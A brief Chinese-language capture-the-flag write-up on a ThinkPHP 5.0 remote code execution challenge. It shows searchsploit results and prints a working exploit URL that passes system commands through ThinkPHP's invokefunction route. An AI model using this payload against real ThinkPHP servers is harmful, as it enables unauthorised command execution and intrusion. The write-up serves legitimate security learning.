首先看题目,rce,就知道是一道remote code execution(远程命令执行)的题目。
打开之后发现是thinkphp 5.0版本的框架
使用searchsploit工具搜索thinkphp,得到以下结果
[i] Unable to detect version in terms: thinkphp[i] Enabling 'searchsploit --strict'-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Exploit Title | Path-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------ThinkPHP - Multiple PHP Injection RCEs (Metasploit) | linux/remote/48333.rbThinkPHP 2.0 - 'index.php' Cross-Site Scripting | php/webapps/33933.txtThinkPHP 5.0.23/5.1.31 - Remote Code Execution | php/webapps/45978.txtThinkPHP 5.X - Remote Command Execution | php/webapps/46150.txt-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Shellcodes: No ResultsPapers: No Results
接着使用searchsploit -m 45978将exploit复制到当前目录中,查看45978.txt就可以得到exploit
http://server/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();
将vars[1][]=后面的内容换成系统命令,即可在根目录中找到flag。
若有收获,就点个赞吧
0 人点赞
